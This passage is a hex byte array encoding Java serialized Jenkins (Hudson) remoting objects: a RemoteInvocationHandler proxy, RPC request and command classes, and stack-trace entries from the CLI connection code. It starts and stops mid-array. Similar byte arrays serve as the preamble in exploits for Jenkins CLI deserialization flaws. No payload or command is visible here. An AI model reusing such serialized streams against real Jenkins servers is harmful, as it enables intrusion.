  0x00, 0x13, 0xff, 0xff, 0xff, 0xff, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x24, 0x50, 0x72, 0x6f, 0x78, 0x79, 0x31, 0x70, 0x74, 0x00,
  0x0f, 0x77, 0x61, 0x69, 0x74, 0x46, 0x6f, 0x72, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x04, 0xe7, 0x71, 0x00, 0x7e, 0x00, 0x20, 0x71, 0x00, 0x7e, 0x00,
  0x21, 0x74, 0x00, 0x15, 0x77, 0x61, 0x69, 0x74, 0x46, 0x6f, 0x72, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x93,
  0x74, 0x00, 0x0e, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x63, 0x6c, 0x69, 0x2e, 0x43, 0x4c, 0x49, 0x74, 0x00, 0x08, 0x43, 0x4c, 0x49, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71,
  0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x48, 0x74, 0x00, 0x1f, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x63, 0x6c, 0x69, 0x2e, 0x43, 0x4c, 0x49, 0x43, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e,
  0x46, 0x61, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x74, 0x00, 0x19, 0x43, 0x4c, 0x49, 0x43, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x46, 0x61, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x2e, 0x6a, 0x61, 0x76, 0x61,
  0x74, 0x00, 0x07, 0x63, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x01, 0xdf, 0x71, 0x00, 0x7e, 0x00, 0x2d, 0x71, 0x00, 0x7e, 0x00, 0x2e, 0x74, 0x00, 0x05, 0x5f, 0x6d,
  0x61, 0x69, 0x6e, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x01, 0x86, 0x71, 0x00, 0x7e, 0x00, 0x2d, 0x71, 0x00, 0x7e, 0x00, 0x2e, 0x74, 0x00, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x73, 0x72, 0x00, 0x26, 0x6a,
  0x61, 0x76, 0x61, 0x2e, 0x75, 0x74, 0x69, 0x6c, 0x2e, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x24, 0x55, 0x6e, 0x6d, 0x6f, 0x64, 0x69, 0x66, 0x69, 0x61, 0x62, 0x6c, 0x65, 0x4c, 0x69,
  0x73, 0x74, 0xfc, 0x0f, 0x25, 0x31, 0xb5, 0xec, 0x8e, 0x10, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x71, 0x00, 0x7e, 0x00, 0x0f, 0x78, 0x72, 0x00, 0x2c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x75,
  0x74, 0x69, 0x6c, 0x2e, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x24, 0x55, 0x6e, 0x6d, 0x6f, 0x64, 0x69, 0x66, 0x69, 0x61, 0x62, 0x6c, 0x65, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74,
  0x69, 0x6f, 0x6e, 0x19, 0x42, 0x00, 0x80, 0xcb, 0x5e, 0xf7, 0x1e, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x01, 0x63, 0x74, 0x00, 0x16, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75, 0x74, 0x69, 0x6c, 0x2f, 0x43, 0x6f, 0x6c,
  0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x3b, 0x78, 0x70, 0x73, 0x72, 0x00, 0x13, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x75, 0x74, 0x69, 0x6c, 0x2e, 0x41, 0x72, 0x72, 0x61, 0x79, 0x4c, 0x69, 0x73, 0x74, 0x78, 0x81,
  0xd2, 0x1d, 0x99, 0xc7, 0x61, 0x9d, 0x03, 0x00, 0x01, 0x49, 0x00, 0x04, 0x73, 0x69, 0x7a, 0x65, 0x78, 0x70, 0x00, 0x00, 0x00, 0x00, 0x77, 0x04, 0x00, 0x00, 0x00, 0x00, 0x78, 0x71, 0x00, 0x7e, 0x00, 0x3c, 0x78,
  0x71, 0x00, 0x7e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x70, 0x73, 0x7d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x2e, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69,
  0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x24, 0x49, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x00, 0x1c,
  0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x49, 0x52, 0x65, 0x61, 0x64, 0x52, 0x65, 0x73, 0x6f, 0x6c, 0x76, 0x65, 0x78, 0x72, 0x00, 0x17, 0x6a, 0x61, 0x76,
  0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x72, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x2e, 0x50, 0x72, 0x6f, 0x78, 0x79, 0xe1, 0x27, 0xda, 0x20, 0xcc, 0x10, 0x43, 0xcb, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x01, 0x68,
  0x74, 0x00, 0x25, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x72, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x2f, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e,
  0x64, 0x6c, 0x65, 0x72, 0x3b, 0x78, 0x70, 0x73, 0x72, 0x00, 0x27, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x49, 0x6e,
  0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x03, 0x00, 0x05, 0x5a, 0x00, 0x14, 0x61, 0x75, 0x74, 0x6f, 0x55, 0x6e,
  0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x42, 0x79, 0x43, 0x61, 0x6c, 0x6c, 0x65, 0x72, 0x5a, 0x00, 0x09, 0x67, 0x6f, 0x69, 0x6e, 0x67, 0x48, 0x6f, 0x6d, 0x65, 0x49, 0x00, 0x03, 0x6f, 0x69, 0x64, 0x5a, 0x00, 0x09,
  0x75, 0x73, 0x65, 0x72, 0x50, 0x72, 0x6f, 0x78, 0x79, 0x4c, 0x00, 0x06, 0x6f, 0x72, 0x69, 0x67, 0x69, 0x6e, 0x71, 0x00, 0x7e, 0x00, 0x0d, 0x78, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x73, 0x71, 0x00,
  0x7e, 0x00, 0x0b, 0x71, 0x00, 0x7e, 0x00, 0x43, 0x74, 0x00, 0x78, 0x50, 0x72, 0x6f, 0x78, 0x79, 0x20, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65,
  0x6d, 0x6f, 0x74, 0x65, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x40, 0x32, 0x20, 0x77, 0x61, 0x73, 0x20, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64,
  0x20, 0x66, 0x6f, 0x72, 0x20, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x20, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f,
  0x74, 0x65, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x24, 0x49, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x75, 0x71, 0x00, 0x7e, 0x00, 0x11, 0x00, 0x00, 0x00,
  0x0d, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x7d, 0x71, 0x00, 0x7e, 0x00, 0x24, 0x71, 0x00, 0x7e, 0x00, 0x25, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00,
  0x89, 0x71, 0x00, 0x7e, 0x00, 0x24, 0x71, 0x00, 0x7e, 0x00, 0x25, 0x74, 0x00, 0x04, 0x77, 0x72, 0x61, 0x70, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x02, 0x6a, 0x71, 0x00, 0x7e, 0x00, 0x20, 0x71, 0x00,
  0x7e, 0x00, 0x21, 0x74, 0x00, 0x06, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x02, 0xa6, 0x74, 0x00, 0x21, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d,
  0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x74, 0x00, 0x16, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x43, 0x6c, 0x61,
  0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e, 0x00, 0x4a, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x46, 0x71, 0x00, 0x7e, 0x00, 0x1d, 0x71, 0x00,
  0x7e, 0x00, 0x1e, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x03, 0x08, 0x71, 0x00, 0x7e, 0x00, 0x20, 0x71, 0x00, 0x7e, 0x00, 0x21, 0x71, 0x00, 0x7e, 0x00, 0x22, 0x73, 0x71,
  0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0xfa, 0x71, 0x00, 0x7e, 0x00, 0x24, 0x71, 0x00, 0x7e, 0x00, 0x25, 0x71, 0x00, 0x7e, 0x00, 0x26, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0xff, 0xff, 0xff, 0xff, 0x71, 0x00,
  0x7e, 0x00, 0x28, 0x70, 0x71, 0x00, 0x7e, 0x00, 0x29, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x04, 0xe7, 0x71, 0x00, 0x7e, 0x00, 0x20, 0x71, 0x00, 0x7e, 0x00, 0x21, 0x71, 0x00, 0x7e, 0x00, 0x2b, 0x73,
  0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x93, 0x71, 0x00, 0x7e, 0x00, 0x2d, 0x71, 0x00, 0x7e, 0x00, 0x2e, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x48, 0x71,
  0x00, 0x7e, 0x00, 0x30, 0x71, 0x00, 0x7e, 0x00, 0x31, 0x71, 0x00, 0x7e, 0x00, 0x32, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x01, 0xdf, 0x71, 0x00, 0x7e, 0x00, 0x2d, 0x71, 0x00, 0x7e, 0x00, 0x2e, 0x71,
  0x00, 0x7e, 0x00, 0x34, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x01, 0x86, 0x71, 0x00, 0x7e, 0x00, 0x2d, 0x71, 0x00, 0x7e, 0x00, 0x2e, 0x71, 0x00, 0x7e, 0x00, 0x36, 0x71, 0x00, 0x7e, 0x00, 0x3a, 0x78,
  0x78, 0x75, 0x72, 0x00, 0x02, 0x5b, 0x42, 0xac, 0xf3, 0x17, 0xf8, 0x06, 0x08, 0x54, 0xe0, 0x02, 0x00, 0x00, 0x78, 0x70, 0x00, 0x00, 0x07, 0x46, 0xac, 0xed, 0x00, 0x05, 0x73, 0x72, 0x00, 0x32, 0x68, 0x75, 0x64,
  0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65,
  0x72, 0x24, 0x52, 0x50, 0x43, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x04, 0x49, 0x00, 0x03, 0x6f, 0x69, 0x64, 0x5b, 0x00, 0x09, 0x61, 0x72, 0x67,
  0x75, 0x6d, 0x65, 0x6e, 0x74, 0x73, 0x74, 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x4c, 0x00, 0x0a, 0x6d, 0x65, 0x74, 0x68,
  0x6f, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x74, 0x00, 0x12, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b, 0x5b, 0x00, 0x05, 0x74, 0x79, 0x70, 0x65, 0x73,
  0x74, 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b, 0x77, 0x08, 0xff, 0xff, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x02, 0x78, 0x72, 0x00,
  0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x03,
  0x49, 0x00, 0x02, 0x69, 0x64, 0x49, 0x00, 0x08, 0x6c, 0x61, 0x73, 0x74, 0x49, 0x6f, 0x49, 0x64, 0x4c, 0x00, 0x08, 0x72, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x74, 0x00, 0x1a, 0x4c, 0x68, 0x75, 0x64, 0x73,
  0x6f, 0x6e, 0x2f, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2f, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x3b, 0x77, 0x04, 0x00, 0x00, 0x00, 0x00, 0x78, 0x72, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73,
  0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x09, 0x63, 0x72,
  0x65, 0x61, 0x74, 0x65, 0x64, 0x41, 0x74, 0x74, 0x00, 0x15, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x45, 0x78, 0x63, 0x65, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x3b, 0x77, 0x04, 0x00, 0x00,
  0x00, 0x00, 0x78, 0x70, 0x73, 0x72, 0x00, 0x1e, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x24, 0x53, 0x6f, 0x75,
  0x72, 0x63, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x06, 0x74, 0x68, 0x69, 0x73, 0x24, 0x30, 0x74, 0x00, 0x19, 0x4c, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2f, 0x72,
  0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2f, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x3b, 0x77, 0x04, 0x00, 0x00, 0x00, 0x00, 0x78, 0x72, 0x00, 0x13, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67,
  0x2e, 0x45, 0x78, 0x63, 0x65, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0xd0, 0xfd, 0x1f, 0x3e, 0x1a, 0x3b, 0x1c, 0xc4, 0x02, 0x00, 0x00, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x72, 0x00, 0x13, 0x6a, 0x61, 0x76, 0x61,
  0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x54, 0x68, 0x72, 0x6f, 0x77, 0x61, 0x62, 0x6c, 0x65, 0xd5, 0xc6, 0x35, 0x27, 0x39, 0x77, 0xb8, 0xcb, 0x03, 0x00, 0x04, 0x4c, 0x00, 0x05, 0x63, 0x61, 0x75, 0x73, 0x65, 0x74,
  0x00, 0x15, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x54, 0x68, 0x72, 0x6f, 0x77, 0x61, 0x62, 0x6c, 0x65, 0x3b, 0x4c, 0x00, 0x0d, 0x64, 0x65, 0x74, 0x61, 0x69, 0x6c, 0x4d, 0x65, 0x73,
  0x73, 0x61, 0x67, 0x65, 0x71, 0x00, 0x7e, 0x00, 0x02, 0x5b, 0x00, 0x0a, 0x73, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x74, 0x00, 0x1e, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e,
  0x67, 0x2f, 0x53, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x3b, 0x4c, 0x00, 0x14, 0x73, 0x75, 0x70, 0x70, 0x72, 0x65, 0x73, 0x73, 0x65, 0x64, 0x45, 0x78,
  0x63, 0x65, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x74, 0x00, 0x10, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75, 0x74, 0x69, 0x6c, 0x2f, 0x4c, 0x69, 0x73, 0x74, 0x3b, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70,
  0x71, 0x00, 0x7e, 0x00, 0x10, 0x70, 0x75, 0x72, 0x00, 0x1e, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x53, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x6c, 0x65,
  0x6d, 0x65, 0x6e, 0x74, 0x3b, 0x02, 0x46, 0x2a, 0x3c, 0x3c, 0xfd, 0x22, 0x39, 0x02, 0x00, 0x00, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70, 0x00, 0x00, 0x00, 0x0b, 0x73, 0x72, 0x00, 0x1b, 0x6a, 0x61, 0x76,
  0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x53, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x61, 0x09, 0xc5, 0x9a, 0x26, 0x36, 0xdd, 0x85, 0x02, 0x00, 0x04,
  0x49, 0x00, 0x0a, 0x6c, 0x69, 0x6e, 0x65, 0x4e, 0x75, 0x6d, 0x62, 0x65, 0x72, 0x4c, 0x00, 0x0e, 0x64, 0x65, 0x63, 0x6c, 0x61, 0x72, 0x69, 0x6e, 0x67, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x02,
  0x4c, 0x00, 0x08, 0x66, 0x69, 0x6c, 0x65, 0x4e, 0x61, 0x6d, 0x65, 0x71, 0x00, 0x7e, 0x00, 0x02, 0x4c, 0x00, 0x0a, 0x6d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x71, 0x00, 0x7e, 0x00, 0x02, 0x77,
  0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70, 0x00, 0x00, 0x00, 0x43, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x6f, 0x6d, 0x6d, 0x61,
  0x6e, 0x64, 0x74, 0x00, 0x0c, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x74, 0x00, 0x06, 0x3c, 0x69, 0x6e, 0x69, 0x74, 0x3e, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00,
  0x32, 0x71, 0x00, 0x7e, 0x00, 0x15, 0x71, 0x00, 0x7e, 0x00, 0x16, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x63, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e,
  0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x74, 0x00, 0x0c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e,
  0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x02, 0x39, 0x74, 0x00, 0x32, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f,
  0x74, 0x65, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x24, 0x52, 0x50, 0x43, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x74, 0x00, 0x1c, 0x52, 0x65,
  0x6d, 0x6f, 0x74, 0x65, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e,
  0x00, 0x13, 0x00, 0x00, 0x00, 0xf6, 0x74, 0x00, 0x27, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x49, 0x6e, 0x76, 0x6f,
  0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x71, 0x00, 0x7e, 0x00, 0x1e, 0x74, 0x00, 0x06, 0x69, 0x6e, 0x76, 0x6f, 0x6b, 0x65, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0xff, 0xff,
  0xff, 0xff, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x24, 0x50, 0x72, 0x6f, 0x78, 0x79, 0x31, 0x70, 0x74, 0x00, 0x0f, 0x77, 0x61, 0x69,
  0x74, 0x46, 0x6f, 0x72, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x04, 0xe7, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d,
  0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x68, 0x61, 0x6e, 0x6e, 0x65, 0x6c, 0x74, 0x00, 0x0c, 0x43, 0x68, 0x61, 0x6e, 0x6e, 0x65, 0x6c, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x74, 0x00, 0x15, 0x77, 0x61, 0x69, 0x74,
  0x46, 0x6f, 0x72, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x93, 0x74, 0x00, 0x0e, 0x68, 0x75, 0x64, 0x73, 0x6f,
  0x6e, 0x2e, 0x63, 0x6c, 0x69, 0x2e, 0x43, 0x4c, 0x49, 0x74, 0x00, 0x08, 0x43, 0x4c, 0x49, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x48,
  0x74, 0x00, 0x1f, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x63, 0x6c, 0x69, 0x2e, 0x43, 0x4c, 0x49, 0x43, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x46, 0x61, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x74,
  0x00, 0x19, 0x43, 0x4c, 0x49, 0x43, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x46, 0x61, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x74, 0x00, 0x07, 0x63, 0x6f, 0x6e, 0x6e, 0x65,
  0x63, 0x74, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x01, 0xdf, 0x71, 0x00, 0x7e, 0x00, 0x2a, 0x71, 0x00, 0x7e, 0x00, 0x2b, 0x74, 0x00, 0x05, 0x5f, 0x6d, 0x61, 0x69, 0x6e, 0x73, 0x71, 0x00, 0x7e, 0x00,
